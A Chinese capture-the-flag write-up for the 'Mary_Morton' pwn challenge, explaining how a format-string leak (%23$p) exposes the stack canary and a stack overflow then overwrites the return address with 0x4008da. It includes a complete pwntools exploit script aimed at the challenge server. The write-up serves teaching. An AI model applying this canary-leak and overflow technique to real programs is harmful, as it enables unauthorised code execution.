攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制

攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第1张图片ctf(pwn) canary保护机制讲解 与 破解方法介绍

程序执行流程

攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第2张图片有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次;

IDA分析

攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第3张图片攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第4张图片

解题思路

程序存在canary保护,利用格式化字符串漏洞 得到canary的位置, 在利用栈溢出覆盖它,返回地址改为目标函数 4008da
攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第5张图片

EXP

from pwn import *
r=remote('111.200.241.244',58448)
r.sendlineafter("3. Exit the battle ",'2')     #先进入格式化字符串利用
r.sendline("%23$p")
r.recvuntil("0x")
canary=int(r.recv(16),16)      #长度16位      取16进制
r.sendlineafter("3. Exit the battle ",'1')     #再进入栈溢出利用
payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)
r.send(payload)
r.interactive()

EXP解读

  1. r.sendline("%23$p")
    0x90-8h=0x88
    攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第6张图片

0x88/0x8=0x11(十进制17)
这里除以8是因为(我翻了一下汇编语言这一本书):

8bit组成1个Byte,也就是一个字节

微型机存储器的存储单元可以存储一个字节,即8个二进制位

一个存储器有128个存储单元,它可存储128个字节

往后找17+6=23个地址上即存canary的值

这里加6是 print输入的偏移量
可以看看 CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb

2.payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)

攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制_第7张图片

有问题的评论区留言吧,我会回的❄

你可能感兴趣的:(pwn题)